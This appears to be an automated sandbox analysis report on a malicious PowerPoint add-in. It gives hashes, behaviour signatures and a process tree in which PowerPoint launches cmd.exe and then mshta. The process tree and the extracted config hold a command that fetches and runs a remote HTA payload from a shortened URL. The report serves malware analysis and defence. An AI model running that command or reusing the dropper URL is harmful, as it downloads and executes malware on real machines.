Analysis

  • max time kernel
    117s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    08-03-2024 03:55

General

  • Target

    ba72cdc906ee871998826bc29de80f4d.ppam

  • Size

    7KB

  • MD5

    ba72cdc906ee871998826bc29de80f4d

  • SHA1

    8736fd54bca97ac9905faadbd83d23b058eeac95

  • SHA256

    3698290728718ee438713d90103eba94adae4448a04607d0d533c3d4e53d1290

  • SHA512

    d1517e58f79ab5dcfe3f5181de4b7a432fbf4c321b3d3797ea303472e1bbb67f1b9a10f19156958d32b9a8fc5fb4435051c08d5e31166ada9abb63ced9c8bb05

  • SSDEEP

    192:xrXP/p6G29r6v/HnCg8Zt0+eX+1qvwmZd80H:dXPF29r6vfl8ZtvYICN

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://www.bitly.com/asdoaksdowuiebdhksauiqwdbnkasbd

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\ba72cdc906ee871998826bc29de80f4d.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2552
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" msgbox/rmshta http://www.bitly.com/asdoaksdowuiebdhksauiqwdbnkasbd
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2884
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://www.bitly.com/asdoaksdowuiebdhksauiqwdbnkasbd
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          PID:2868

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2120-0-0x000000002D6C1000-0x000000002D6C2000-memory.dmp

      Filesize

      4KB

    • memory/2120-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2120-2-0x00000000729AD000-0x00000000729B8000-memory.dmp

      Filesize

      44KB

    • memory/2120-7-0x00000000042E0000-0x00000000043E0000-memory.dmp

      Filesize

      1024KB

    • memory/2120-8-0x00000000042E0000-0x00000000043E0000-memory.dmp

      Filesize

      1024KB

    • memory/2120-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2120-56-0x00000000729AD000-0x00000000729B8000-memory.dmp

      Filesize

      44KB